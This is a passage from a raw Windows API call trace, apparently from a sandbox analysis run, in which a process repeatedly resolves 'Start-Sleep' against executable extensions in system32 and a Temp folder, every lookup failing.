lpFileName="C:\\Windows\\system32\\Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.COM", lpFilePart=0x0) returned 0x23 [0225.396] GetFullPathNameW (in: lpFileName="Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpFilePart=0x0) returned 0x34 [0225.396] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.396] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.397] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.COM", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.398] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x23 [0225.398] GetFullPathNameW (in: lpFileName="Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x34 [0225.398] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.398] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.400] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.EXE", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.401] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x23 [0225.401] GetFullPathNameW (in: lpFileName="Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x34 [0225.401] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.401] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.402] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.BAT", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.480] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.481] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x23 [0225.481] GetFullPathNameW (in: lpFileName="Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x34 [0225.481] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.481] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.482] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.CMD", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.483] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x23 [0225.483] GetFullPathNameW (in: lpFileName="Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x34 [0225.483] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.483] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.484] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.VBS", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.485] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x23 [0225.485] GetFullPathNameW (in: lpFileName="Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x34 [0225.485] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.485] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.486] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.VBE", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.487] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.JS", lpFilePart=0x0) returned 0x22 [0225.487] GetFullPathNameW (in: lpFileName="Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpFilePart=0x0) returned 0x33 [0225.487] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.487] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.488] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.JS", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.489] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x23 [0225.489] GetFullPathNameW (in: lpFileName="Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x34 [0225.489] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.489] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.490] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.JSE", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.491] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x23 [0225.491] GetFullPathNameW (in: lpFileName="Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x34 [0225.491] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.491] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.492] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.WSF", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.493] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x23 [0225.493] GetFullPathNameW (in: lpFileName="Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: 